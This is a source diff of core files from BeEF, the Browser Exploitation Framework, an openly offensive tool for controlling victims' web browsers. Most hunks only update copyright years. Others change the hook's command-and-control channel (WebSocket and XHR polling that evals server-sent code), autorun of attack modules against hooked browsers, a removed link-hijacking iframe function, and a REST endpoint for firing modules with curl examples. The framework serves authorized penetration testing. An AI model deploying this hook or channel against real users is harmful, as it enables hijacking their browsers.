+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/session.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -68,26 +68,7 @@ beef.session = {
 		}
 		
 		return hook_session_id;
-	},
-
-	/**
-	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
-	 */
-	persistent: function() {
-		$j('a').click(function(e) {
-			if ($j(this).attr('href') != '')
-			{
-				e.preventDefault();
-				beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
-				$j(document).attr('title', $j(this).html());
-				document.body.scroll = "no";
-				document.documentElement.style.overflow = 'hidden';
-			}
-		});
 	}
-	
-
-				
 };
 
 beef.regCmp('beef.session');

core/main/client/timeout.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/updater.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -8,13 +8,13 @@
  * @Literal object: beef.updater
  *
  * Object in charge of getting new commands from the BeEF framework and execute them.
+ * The XHR-polling channel is managed here. If WebSockets are enabled,
+ * websocket.ls is used instead.
  */
 beef.updater = {
 	
-	// Low timeouts combined with the way the framework sends commamd modules result 
-	// in instructions being sent repeatedly or complex code. 
-	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 5000,
+	// XHR-polling timeout.
+    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
 	
 	// A lock.
 	lock: false,
@@ -42,22 +42,22 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			}
-
-            else {
+			}else {
 				this.get_commands();    /*Polling*/
 			}
 		}
 
       // ( typeof beef.websocket === "undefined")
-		setTimeout("beef.updater.check();", beef.updater.timeout);
+		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
 	
-	// Gets new commands from the framework.
-	get_commands: function(http_response) {
+    /**
+     * Gets new commands from the framework.
+     */
+	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });
@@ -68,13 +68,12 @@ beef.updater = {
 		this.lock = false;
 	},
 	
-	// Executes the received commands if any.
+    /**
+     * Executes the received commands, if any.
+     */
 	execute_commands: function() {
 		if(beef.commands.length == 0) return;
-		
 		this.lock = true;
-		/*here execute the command */
-
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
@@ -83,7 +82,6 @@ beef.updater = {
 				console.error('execute_commands - command failed to execute: ' + e.message);
 			}
 		}
-		
 		this.lock = false;
 	}
 };

core/main/client/websocket.js

@@ -1,76 +1,90 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 
-//beef.websocket.socket.send(take answer to server beef)
-/*New browser init call this */
+/**
+ * @Literal object: beef.websocket
+ *
+ * Manage the WebSocket communication channel.
+ * This channel is much faster and responsive, and it's used automatically
+ * if the browser supports WebSockets AND beef.http.websocket.enable = true.
+ */
 
 beef.websocket = {
 
     socket:null,
-    alive_timer:<%= @websocket_timer %>,
+    ws_poll_timeout: "<%= @ws_poll_timeout %>",
 
+    /**
+     * Initialize the WebSocket client object.
+     * Note: use WebSocketSecure only if the hooked domain is under https.
+     * Mixed-content in WS is quite different from a non-WS context.
+     */
     init:function () {
         var webSocketServer = beef.net.host;
-        var webSocketPort = <%= @websocket_port %>;
-        var webSocketSecure = <%= @websocket_secure %>;
+        var webSocketPort = "<%= @websocket_port %>";
+        var webSocketSecure = "<%= @websocket_secure %>";
         var protocol = "ws://";
-        //console.log("We are inside init");
-        /*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
+
         if(webSocketSecure && window.location.protocol=="https:"){
             protocol = "wss://";
-        webSocketPort= <%= @websocket_sec_port %>;
+            webSocketPort= "<%= @websocket_sec_port %>";
         }
 
-    if (beef.browser.isFF() && !!window.MozWebSocket) {
-        beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
-
-        } else {
-        beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        if (beef.browser.isFF() && !!window.MozWebSocket) {
+            beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        }else{
+            beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
         }
 
     },
-    /* send Helo message to the BeEF server and start async communication*/
+
+    /**
+     * Send Helo message to the BeEF server and start async polling.
+     */
     start:function () {
         new beef.websocket.init();
         this.socket.onopen = function () {
-        //console.log("Socket has been opened!");
-
-        /*send browser id*/
-        beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
-            //console.log("Connected and Helo");
+            beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
             beef.websocket.alive();
-        }
+        };
+
         this.socket.onmessage = function (message) {
-            //console.log("Received message via WS."+ message.data);
+            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
+            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
             eval(message.data);
-        }
+        };
 
         this.socket.onclose = function () {
-        setTimeout(function(){beef.websocket.start()}, 5000);
-        }
-
+            setTimeout(function(){beef.websocket.start()}, 5000);
+        };
     },
 
+    /**
+     * Send data back to BeEF. This is basically the same as beef.net.send,
+     * but doesn't queue commands.
+     * Example usage:
+     * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+     * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+     * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+     */
     send:function (data) {
         try {
-        this.socket.send(data);
-        //console.log("Sent [" + data + "]");
-         }
-         catch(err){
-         //console.log(err);
-
-         }
+            this.socket.send(data);
+        }catch(err){}
     },
 
+    /**
+     * Polling mechanism, to notify the BeEF server that the browser is still hooked,
+     * and the WebSocket channel still alive.
+     * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
+     */
     alive: function (){
         beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
-//        console.log("sent alive");
-        setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
-
+        setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
     }
 };
 

core/main/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/console/banners.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/console/commandline.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/browsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/distributedengine.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/hardware.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/os.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/crypto.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/distributed_engine/models/rules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -24,6 +24,9 @@ module BeEF
         end
 
         def setup()
+          print_debug "[INIT] Processing Browser Details..."
+          config = BeEF::Core::Configuration.instance
+
           # validate hook session value
           session_id = get_param(@data, 'beefhook')
           (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -273,19 +276,25 @@ module BeEF
 
 
           # Call autorun modules
-          autorun = []
-          BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
-            if v.has_key?('autorun') and v['autorun'] == true
-              if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
-                BeEF::Module.execute(k, session_id)
-                autorun.push(k)
-              else
-                print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
+          if config.get('beef.autorun.enable')
+            autorun = []
+            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
+              if v.has_key?('autorun') and v['autorun'] == true
+                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
+                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                else
+                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+                end
               end
+            }
+            if autorun.length > 0
+              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
             end
-          }
-          if autorun.length > 0
-            print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
           end
         end
 

core/main/handlers/commands.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/modules/beefjs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -23,14 +23,16 @@ module BeEF
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
             ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
 
+            # @note BeEF libraries: need Eruby evaluation and obfuscation
+            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
             # @note Load websocket library only if WS server is enabled in config.yaml
-            if config.get("beef.http.websocket.enable") == false
-              # @note BeEF libraries: need Eruby evaluation and obfuscation                                                                                                                           #antisnatchor: leave timeout.js as the last one!
-              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
-            else                                                                                                                                                                                                   #antisnatchor: leave timeout.js as the last one!
-              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
+            if config.get("beef.http.websocket.enable") == true
+              beef_js_sub_files << "websocket.js"
             end
 
+            # @note antisnatchor: leave timeout.js as the last one!
+            beef_js_sub_files << "timeout.js"
+
             ext_js_to_obfuscate = ''
             ext_js_to_not_obfuscate = ''
 
@@ -69,6 +71,9 @@ module BeEF
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
             end
 
+            # @note set the XHR-polling timeout
+            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
+
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?
               if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -84,7 +89,7 @@ module BeEF
             if config.get("beef.http.websocket.enable")
               hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
               hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
-              hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
+              hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
               hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
             end
 

core/main/handlers/modules/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -52,7 +52,7 @@ module BeEF
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
               #//
-              #//   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
               #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
               #//   See the file 'doc/COPYING' for copying permission
               #//

core/main/logger.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/hookedbrowser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/log.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/optioncache.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/result.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/user.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/websocket/websocket.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/admin.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/categories.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/logs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -157,7 +157,8 @@ module BeEF
 
         #
         #@note Fire a new command module to multiple hooked browsers.
-        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        # Returns the command IDs of the launched module, or 0 if firing got issues.
+        #
         # POST request body example (for modules that don't need parameters, just remove "mod_params")
         #  {
         #    "mod_id":1,
@@ -166,12 +167,15 @@ module BeEF
         #     },
         #    "hb_ids":[1,2]
         #   }
+        #
         # response example: {"1":16,"2":17}
+        #
         # curl example (alert module with custom text, 2 hooked browsers)):
+        #
         #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
         #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
         #
-        post '/multi' do
+        post '/multi_browser' do
           request.body.rewind
           begin
             body = JSON.parse request.body.read
@@ -204,6 +208,68 @@ module BeEF
             error 400 # Bad Request
           end
         end
+
+        # @note Fire multiple command modules to a single hooked browser.
+        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        #
+        # POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} )
+        #{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        #    "modules": [
+        #        {    # test_return_long_string module with custom input
+        #             "mod_id":99,
+        #              "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]
+        #        },
+        #        {   # prompt_dialog module with custom input
+        #            "mod_id":116,
+        #            "mod_input":[{"question":"hooked?"}]
+        #        },
+        #        {   # alert_dialog module without input (using default input, if any)
+        #            "mod_id":128,
+        #            "mod_input":[]
+        #        }
+        #    ]
+        #  }
+        # response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0)
+        #
+        # curl example (test_return_long_string and prompt_dialog module with custom inputs)):
+        #
+        #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        # "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}'
+        #  -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92
+        #
+        post '/multi_module' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+            hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"])
+            error 401 unless hb != nil
+
+            results = Hash.new
+            if body["modules"] != nil
+              body["modules"].each{|mod|
+                mod_id = mod["mod_id"]
+                mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"]
+                if mod_k == nil
+                  results[mod_id] = 0
+                  next
+                else
+                  mod_params = []
+                  mod["mod_input"].each{|input|
+                    input.each{|k,v|
+                      mod_params.push({'name' => k, 'value' => v})
+                    }
+                  }
+                  cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params)
+                  results[mod_id] = cmd_id
+                end
+              }
+            end
+            results.to_json
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
+            error 400 # Bad Request
+          end
+        end
       end
     end
   end

core/main/router/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/router/router.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/ruby.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/ruby/hash.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/ruby/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #